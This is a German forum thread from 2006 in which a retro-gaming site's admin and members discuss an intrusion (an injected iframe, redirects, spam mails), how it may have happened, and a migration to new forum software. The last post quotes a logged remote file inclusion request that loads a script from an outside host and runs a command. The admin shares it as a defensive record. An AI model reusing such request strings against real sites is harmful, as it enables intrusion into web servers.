Kultboy Forum
Allgemein => Forum => Thema gestartet von: kultboy am 22.07.2006, 09:08
-
Vielleicht haben es einige mitbekommen, aber das Forum und die Hauptseite wurden anscheinend von einen Hacker oder änliches heimgesucht.
Es wurde ein IFrame eingebaut der dann eine eigene Seite aufruft. Bisher ist mir noch unbekannt was genau die Datei macht.
Ich habe meinen Provider die Daten geschickt und bin gespannt was zurück kommt. Ok beim Forum lasse ich es mir einreden da es schon alt ist, aber meine Hauptseite?? Ich habe da so viele Sachen eingebaut das nichts passieren kann, und dann doch. Verdammt verdammt... naja mal abwarten auf den Support wie es passiert ist.
Zum Glück wurde nichts beschädigt oder gelöscht. :rolleyes:
-
Hu??? Was passierte? Habe nichts bemerkt.
-
Worum geht es? :) Kann keine Veränderung feststellen, auch wenn ich meinen guten Werbeblocker ausschalte.
-
Bei mir geht, immer wenn ich eine neue Seite öffne ein kleines Fenster auf in dem steht "Warning, Virus found, und noch irgendwas mit einem Trojaner". Das muss ich dann erst mit ok quittieren bevor ich dann wieder was machen kann. Ist es das was du meinst?
-
Ich kann auch nichts erkennen. Vielleicht liegt´s daran, daß ich Firefox benutze.
-
Ob das damit zusammenhängt?! Hab ne komische Mail bekommen. Ihr auch?
Interessant vorallem "An: webmaster[et]kultboy.com". Normal steht da ja meine Addy bzw. mein Kürzel.
-
hmm.... habe ich soeben auch bekommen... :eek:
-
Die Mail habe ich auch bekommen. (wie kommt der an die Adressen, meine ist nicht hinterlegt)???
Die Hauptseite wird nicht richtig angezeigt und das Foru geht nicht richtig!
-
Die Mail habe ich auch bekommen. (wie kommt der an die Adressen, meine ist nicht hinterlegt)???
Die Hauptseite wird nicht richtig angezeigt und das Foru geht nicht richtig!
-
Und die Seite wird umgeleitet (achtet mal auf die Anzeige beim Seitenwechsel) man kommt weg von www.Kultboy.com auf irgendwas mit zhark oder so
-
Ich hab auch so ne Mail bekommen.
Mittlerweile gehen bei mir pro Seite die ich auf kultboy anklicke mindestens 2 von diesen Warnfenstern auf, meistens sogar 3. Wenn das so weiter geht....
-
Sorry das ich den vorherigen Beitrag so oft hinzugefügt habe, aber ich bekomme jedesmal eine leer Seite angezeigt wenn ich den hinzufügen drücke. :cry:
edit by Gismo - Hab Sie mal entfernt ;)
-
Ja, das Forum funktioniert auch nicht mehr richtig. Klickt man auf "Letzter Beitrag" eines Themas, bekommt man auch nur ein weißes Feld. Man kommt nur noch über das gesamte Thema rein. Sowas...
Hat mal einer auf die Links in der Mail geklickt?
@raccoon: Deine Mail-Adresse muss hinterlegt sein, sonst hättest Du Dich hier ja nicht registrieren können.
-
Ich hoffe, es sind Backups für das Forum und die Website vorhanden.... :eek:
-
So das Forum läuft wieder.
Durch die alte Lücke sollte er nicht mehr kommen. Ich hoffe das war die einzige. Ich habe auch noch zusätzlich gegen SQL Injections etwas eingebaut.
Passwörter wurde nicht gehakt!! Es wurde auch nichts gelöscht! Das einzige was leider passierte ist das der Trojaner alle Mails hat.
Ich habe übrigens auch gleich den Bug mit den Dateianhängen repariert, das sollte nun richtig funktionieren (also wenn eine *.zip angehängt ist).
Das Forum läuft erstmal testweise!
Ich hoffe das sowas nicht noch mal passiert. Ob vielleicht wirklich einige gegen unsere Welteroberungspläne sind? ;)
-
:tomato: :cucumber: :leekguitar:
-
JUHU, mein Leben hat wieder einen Sinn!!! Und schön, dass du die Off Zeit gleich dazu genutzt hast, paar Fehler zu beheben.
Wir sollten wohl Phase 2 unserer Eroberungspläne einleiten, damit sowas nicht nochmal passiert! ;)
-
Bin gespannt wann der erste in die Falle tappt bzw. es wieder probiert. Diesmal habe ich schwere Geschütze aufgefahren. :D
-
Diese Mail hab ich auch bekommen. Dachte zuerst, Kulty wollte mir nen Gutschein für ne Kiste Bier zuschicken oder. Aber da ich ja einsame Klasse im schnell Kombinieren bin, hab ich mir schon gedacht, daß da was nicht stimmen kann :D
-
Es wurde ein IFrame eingebaut [...]
Leider ist sowas unglaublich einfach. Wenn man die Board-Software kennt, kann man eine URL zum Versenden von Massen-E-Mails erzeugen, die in einen Beitrag einhacken und wenn der Admin diesen Beitrag liest, wird die URL aufgerufen und die Massen-E-Mails gehen raus (dank der Admin-Rechte des "Lesenden").
In der letzten Zeit haben sich viele neue Methoden entwickelt, wie man Seiten hacken kann. Und daher ist's hier wohl auch passiert: Das Forum ist einfach zu alt! Wenn man ein Forum betreibt, muss man ständig updaten. Und wenn's (wie beim IPB 1.x) keine Updates mehr gibt, muss man halt umsteigen. Je nach Provider musst du sogar höllisch aufpassen, da du haftbar gemacht werden kannst, wenn dem Provider durch deine Nachlässigkeit (alte Software, keine Updates, etc.) Schäden entstehen. Wurde selbst von meinem Provider gewarnt, als ich noch ein phpBB2 laufen hatte...
-
Das ist richtig, aber mein Provider hatte keine zicken gemacht ganz im Gegenteil die haben sogar geholfen.
Das das Forum zu alt ist weiß ich schon länger, aber was soll ich tun? Wenn ich das damals gewußt hätte, hätte ich dieses Forum gar nicht genommen. Und das ganze auf eine 2.x.x Version Updaten geht auch nicht, da ich das Forum sonst kaufen muss und das ist nicht gerade wenig... was für Möglichkeiten bleiben also? Entweder (wieder) umsteigen auf ein anderes was gratis ist, aber da ist auch wieder die Gefahr gegeben das Sicherheitslücken sind und das es irgendwann nicht mehr gratis ist, oder es wird gar kein "Forum" mehr geben.
Meine Idee ist die das das Forum auf der Hauptseite einfach erweitert wird und somit gibt es dann nur mehr ein Forum. Da wären wir dann auf der ganz sicheren Seite.
Aber das ist noch Zukunft...
-
Das IPB war in der Version 2.0 eine Zeit lang kostenlos. Ich glaube, ich hatte dir damals auch zum Update geraten, als die Version 2.0 noch kostenlos war. Nützt jetzt natürlich auch nichts mehr, da diese Version auch schon alt ist und neuere Versionen Geld kosten.
Ich verwende zur Zeit für das GTW-Forum "Simple Machines". Das ist sehr sicher, da die Programmierer sehr viel Erfahrung haben (die waren auch für das YaBB und YaBBSE verantwortlich). Außerdem kann man dort Updates mit einem einzigen Klick im Admin-CP installieren, also nichts mehr mit: Update runterladen, entpacken, per FTP hochladen. Einfach ein Klick und fertig. :) Kostenlos ist es natürlich auch, und verglichen mit diesem IPB von 2003 technisch ein riesiger Unterschied.
-
Danke für den Tip! Werde ich mir heute am Abend ansehen, wie ich sehe gibt es das auch auf deutsch und einen Konverter für dieses Forum gibt es auch... hmmm das ist sehr gut, dann würden die Beiträge alle bleiben. Das ist echt fein.
Aber gut ich muss mir das erst alles ansehen, aber umsteigen müssen wir, ich sage es gleich Leute... :rolleyes:
-
Wenn du es dir anschaust, dann nimm Version 1.1RC2. Ist zwar "nur" ein Release Candidate, aber besser als Version 1.0.7. Sicherheitstechnisch sind beide auf dem gleichen Level.
-
Ok die habe ich runtergeladen! Jetzt muss ich aber schon los, bin gespannt was das alles kann.
-
Oh, gestern war wohl viel los. Und ausgerechnet da war ich nicht on. War bestimmt lustig, millionen von fluchenden, traurigen Retroianer zu begegnen. Was habt ihr denn so für Flüche drauf? :ballon
-
Puh, scheint ja wieder alles normal zu funktionieren...
Leider habe ich den ganzen Zauber verpasst, nur diese komische EMail hatte ich auch im Postkasten.
Nun jut, hoffen wir, dass wir in nächster Zeit von solchem Unfug verschont bleiben.
Mann, Mann, Mann, das kultboy-Foum hacken... manche Leute haben echt zuviel Freizeit... :rolleyes: :ks:
-
Ich bin nur mal gespannt was jetzt so an Spam auf uns zukommt?? Mit ein bisschen Glück hat der Sack nur die Mails verteilt ohne sich die Adressen zu ziehen. :(
-
@racoon
Der wird seine Strafe schon noch erhalten. Am Tage des jüngsten Computergerichts! :flaming:
-
@WK
Habe mir das jetzt mal angesehen, so einfach ist das auch nicht. Da muß ich zuerst die 1.07 Version installieren da der Konverter nur mit der läuft. So wenn das hoffentlich geschaft ist muss ich das neue Update raufspielen, nur wo ist dieser besagte Knopf?! Habe ich Tomaten auf den Augen?! Das muss ich ja händisch alles kopieren und starten für das Update. Local habe ich das ganze jetzt mal durchgespielt und hat funktioniert. Nur ich hoffe das es dann auch wirklich hier funktioniert da die DB schon über 80MB hat... :rolleyes:
Und das was mich etwas abschreckt sind die Styles. Mein Gott ist das kompliziert und viel!!! Hier war das ja noch einfach, aber dort? Hunderte Grafiken und was weiß ich alles, das ja eine Aufgabe die ist unmöglich... aber gut mal schauen ob es was änliches gibt. :rolleyes:
Sonst macht mir das Forum einen sehr guten Eindruck. Vorallem so schnell! Wahnsinn! Und es hat einige tolle neue Sachen, gefällt mir. :)
So wie es aussieht werden wir demnächst in ein neues Forum umziehen. Wenn das passiert wird es vorher angekündigt. Ich hoffe das es auch klappt.
-
Das hoffe ich aber auch. Wenn da was schief läuft, ist ein Weltkulturerbe im Eimer. :cry:
-
Habe gerade ein Theme gefunden was mir gut zusagt und auch "schlicht" ist, also ohne hunderte Grafiken. Nur das alles wieder farblich anpassen dauert wieder eine ewigkeit... seufz.
Nur leider dürfte der Arcade Berich ein Opfer werden, außer es gibt dort einen Mod dafür, muss ich erst nachsehen.
-
@kultboy: Okay, wenn der Konverter nur mit Version 1.0.7 geht, ist das etwas komplizierter. Wusste ich natürlich nicht... Hatte am Anfang auch erst Version 1.0.7 installiert, aber nur, weil ich erst später gesehen habe, dass das nicht die neuste Version ist. Das Update auf 1.1RC2 geht nur per FTP-Upload, macht aber keinerlei Probleme. Updates kann man dann später mit einem Klick im AdminCP unter dem Punkt "Packages" installieren (genau wie Mods/Add-ons, inkl. Uninstall-Funktion!), da sollte auch direkt ein Sicherheits-Update angezeigt werden. Wenn du das zum ersten Mal machst, fragt das Board eventuell noch nach den FTP-Zugangsdaten, die muss man aber nur einmal eingeben.
Das mit dem Style-System hat mich anfangs auch abgeschreckt, vor allem weil es keine echte Trennung zwischen PHP-Code und HTML gibt. Das hat aber auch ein paar Vorteile. Im Grunde ist es aber egal, du brauchst eh nur das Stylesheet zu bearbeiten, so ein komplexes Style hat das kultboy-Forum ja nun nicht, dass das viel Arbeit wäre. ;) Das Standard-Style von Version 1.1RC2 ist übrigens viel übersichtlicher.
-
Ah ich verstehe danke!
Ich bin schon am umarbeiten. War Anfangs wirklich sehr schrecklich, aber jetzt geht es. Zum Glück ist alles super beschrieben. Nur wird das noch einige Tage dauern. Bin schon gespannt wie es euch dann gefällt. :)
WICHTIG FÜR ALLE BITTE LESEN!
Das Forum wird zu 95% diese Woche erneuert, daher bitte jetzt schon eure Fotos oder PN's oder was weiß ich was sicherheitshalber sichern. Ich kann für nichts garantieren. Ich hoffe das der Konverter alles schafft, wenn nicht haben wir ein großes Problem. :rolleyes:
-
Bin soeben fertig geworden mit den änderungen an dem neuen Forum.
Da ich morgen schon am Nachmittag heimkomme und sonst nichts vorhabe, wird das ganze morgen circa ab 16 Uhr über die Bühne gehen! Wenn alles klappt und nichts schief geht, sollte das neue Forum am Abend laufen. Wenn es einen oder zwei Tage länger dauert, entschuldigt bitte.
Also packen und sagt tschüss zum Forum es wird morgen in Rente geschickt. :cry:
-
Auf zu neuen Ufern!!
Wenn alles geklappt hat, sollte Kulty eine Rede halten und sagen: "Es war ein kleiner Schritt für das Forum, aber ein großer Schritt für die gesamte Forengemeinde" und irgendwo die amerikanische Flagge hissen. :D
-
@GregBradley
:nein:
wenn schon, dann eine Powerplay-ASM-Amiga-Joker-(....)-Fahne :lehrer:
-
Sagt mal das kann doch wohl nicht wahr sein!!!!
Wie wollen wir bitteschön die Weltherrschaft erreichen, wenn wir uns nicht mal auf ne Fahne einigen können....... :D :D ;)
-
Also packen und sagt tschüss zum Forum es wird morgen in Rente geschickt. :cry:
Bleiben die Beiträge aus diesem Forum in einem "Archiv" erhalten, oder werden die wie die Beiträge aus dem alten Forum auch auf nimmer Wiedersehen begraben? Es gab doch auch mal ein Archiv vom alten Forum, warum ist das weg? Die armen Mitglieder, die sich damals die Finger wundgetippt haben, und jetzt nichts mehr davon haben, weil deren damalige Beiträge nicht mehr existieren... :P
Hab ich jetzt etwa knapp 1400 Beiträge "umsonst" geschrieben? :nein:
Also dann, ich flieg jetzt in wenigen Stunden bis Ende der Woche weg. Wenn ich wiederkomme, erwarte ich ein Forum, was mir von der Optik her die Schuhe auszieht, mich vom Stuhl haut und auch dem Kaiser seinen berühmten Satz entlocken würde: Da legs´di nieda... :cen:
-
Wenn kultboy alles richtig macht, ändert sich bis auf die Board-Software nichts. D.h. es wird nur anders aussehen, aber alle Themen und Beiträge bleiben so, wie sie jetzt sind, also kein Archiv oder so.
-
Wie WK schon sagt, es wird alles übernommen. Nur kann ich nicht garantieren das wirklich ALLES übernommen wird.
Sonst wird das Forum aussehen wie dieses hier, nur ein bißchen anders. Aber laßt euch überraschen.
PS: Natürlich wird die ASM Flagge gehießt! Ist doch klar, oder? ;)
-
PS: Natürlich wird die ASM Flagge gehießt! Ist doch klar, oder? ;)
Och... und warum nicht PP oder AJ? :eek:
-
Eigentlich müsste ja die PP, ASM, AJ und HC gehießt werden. ;)
Übrigens, es hat gestern jemand versucht über die Hauptseite zu kommen:
==============================================================
Time: 25.07.2006, 21:19:57
IP-Adress: 83.103.77.187
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Refering URL:
URL: /index.php?site=http://e.1asphost.com/mrcard/tool25.txt?&cmd=id
Folgender String wurde über die URL übergeben:
http://e.1asphost.com/mrcard/tool25.txt (http://e.1asphost.com/mrcard/tool25.txt)?
==============================================================
Das war Nr. 1, bin gespannt wieviele da noch kommen bzw. probieren. Aber sollen sie ruich, die haben keine Chance diese Wixer! Achja bitte nicht ausprobieren, die IP wird sonst automatisch gesperrt...